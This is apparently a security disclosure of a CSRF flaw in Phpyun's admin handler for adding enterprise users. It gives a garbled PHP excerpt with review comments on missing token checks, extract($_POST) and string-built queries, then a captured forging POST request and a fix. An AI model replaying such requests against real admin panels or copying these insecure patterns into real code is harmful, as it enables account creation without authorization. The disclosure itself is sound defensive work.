Phpyun: CSRF in the admin panel allows adding enterprise users
The affected code is in /admin/model/admin_company.class.php:
// NOTE(review): excerpt as published on the page. The text has been through an
// extraction/translation step (spaces inside tokens, "Elseif", altered quote
// characters) and stops before the closing braces of the submit branch and of
// the method, so it is not runnable as shown.
//
// add_action() handles the admin "add company member" form. When
// $_POST['submit'] is set it validates the fields, looks for an existing member
// with the same username or email, inserts a row into member and, if a uid comes
// back, rows into company, company_statis and friend_info. It then either emits
// a script redirect (when $_POST['type'] is set) or shows $msg.
//
// Security-relevant points visible in this excerpt:
//  - Nothing in the shown code checks a CSRF token or the Referer header before
//    the inserts run; any such check would have to live in code not shown here.
//  - extract($_POST) turns every POST field into a local variable, so $username,
//    $password, $email, $address, $status, $moblie, $name and $rating_name are
//    request-controlled, and a POST field can overwrite existing locals such as
//    $rating_list.
//  - Those variables are interpolated directly into the condition/value strings
//    passed to DB_select_once() and DB_insert_once(). Whether escaping happens
//    elsewhere is not visible here -- TODO confirm.
//  - The password branch tests strlen($username), not strlen($password), so the
//    password length is never actually validated.
//  - Passwords are stored as md5(md5($password) . $salt), with the salt taken
//    from the last six characters of uniqid(rand()); password_hash() /
//    password_verify() is the current replacement for this scheme.
//  - The single "=" and "|" in the conditions look like extraction damage
//    (presumably "==" and "||" in the real file) -- confirm against the original.
Function add_action () {$ rating_list = $ this-> obj-> DB_select_all ("company_rating", "'category '= 1 "); if ($ _ POST ['submit ']) {extract ($ _ POST); if ($ username = "" | strlen ($ username) <2 | strlen ($ username)> 15) {$ msg = "The member name cannot be blank or does not meet the requirements! ";} Elseif ($ password =" "| strlen ($ username) <2 | strlen ($ username)> 15) {$ msg = "the password cannot be blank or does not meet the requirements! ";} Elseif ($ email =" ") {$ msg =" email cannot be blank! ";} Else {if ($ this-> config ['sy _ uc_type '] =" uc_center ") {$ this-> obj-> uc_open (); $ user = uc_get_user ($ username);} else {$ user = $ this-> obj-> DB_select_once ("member ", "'username' = '$ username' OR 'email' = '$ email'");} if (is_array ($ user )) {$ msg = "the user name or email address already exists! ";}Else {$ ip = $ this-> obj-> fun_ip_get (); $ time = time (); if ($ this-> config ['sy _ uc_type '] = "uc_center") {$ uid = uc_user_register ($ _ POST ['username'], $ _ POST ['Password'], $ _ POST ['email ']); if ($ uid <0) {$ this-> obj-> get_admin_msg ("index. php? M = com_member & c = add "," this email already exists! ");} Else {list ($ uid, $ username, $ email, $ password, $ salt) = uc_get_user ($ username ); $ value = "'username' = '$ username', 'Password' =' $ password', 'email '=' $ email ', 'usertype' = '2 ', 'address' = '$ address', 'status' =' $ status', 'salt' = '$ salt', 'moblie' = '$ moblie ', 'reg _ date' = '$ time', 'reg _ ip' =' $ ip' ";}} else {$ salt = substr (uniqid (rand ()), -6); $ pass = md5 (md5 ($ password ). 
$ salt); $ value = "'username' = '$ username', 'Password' =' $ pass ', 'Email '=' $ email ', 'usertype' = '2', 'address' =' $ address', 'status' = '$ status ', 'salt' = '$ salt', 'moblie' = '$ moblie', 'reg _ date' = '$ time ', 'reg _ ip' = '$ ip' ";} $ nid = $ this-> obj-> DB_insert_once (" member ", $ value ); $ new_info = $ this-> obj-> DB_select_once ("member", "'username' = '$ username'"); $ uid = $ new_info ['uid']; if ($ uid> 0) {$ this-> obj-> DB_insert_once ("company", "'uid' = '$ uid', 'name' =' $ name ', 'linktel' = '$ moblie', 'linkmail' =' $ Email ', 'address' =' $ address' "); $ rat_arr = @ explode (" + ", $ rating_name ); $ value = "'uid' = '$ uid',"; $ value. = $ this-> rating_info ($ rat_arr [0]); $ this-> obj-> DB_insert_once ("company_statis", $ value ); $ this-> obj-> DB_insert_once ("friend_info", "'uid' = '$ uid', 'nickname' =' $ name ', 'usertype' = '2' "); $ msg =" member (ID :". $ uid. ") added successfully" ;}}}if ($ _ POST ['type']) {echo "<script type = 'text/javascript '> window. location. href = 'index. php? M = admin_company_job & c = show & uid = ". $ nid. "'</script>"; die;} else {$ this-> obj-> ACT_layer_msg ($ msg, 9, "index. php? M = admin_company ", 2, 1 );}
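The handler does not verify a CSRF token, and it does not check the Referer header either. The form does submit a pytoken field (see the request below), but nothing in add_action as shown compares it with a server-side value.
CSRF was therefore tested against a local installation.
The request that was submitted: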
POST /phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 211
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_2a935166b0c9b73fef3c8bae58b95fe4=1411140464; bdshare_firstime=1411271506008; PHPSESSID=a65b349c297eaf372de3b329d7220db4; friend=0; friend_message=0; sysmsg=0; ashell=c0e024d9200b5705bc4804722636378a; remind_num=0

rating_name=3%2B%C3%E2%B7%D1%BB%E1%D4%B1&username=xssss&password=123456&email=10088055%40qq.com&moblie=132863&name=xss&address=xss&status=1&submit=%26%23160%3B%CC%ED+%BC%D3%26%23160%3B&pytoken=ebf2387fb39c&type=
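Because neither a token nor the Referer is checked, a form on another site that submits these fields is accepted when a logged-in administrator's browser sends it.
The user was added.
The same problem affects the actions that modify user data. I will not report each of them separately and only mention it here.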
Solution:
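Add CSRF token verification or a Referer check to these actions. Token verification is the more robust of the two, because the Referer header can legitimately be absent.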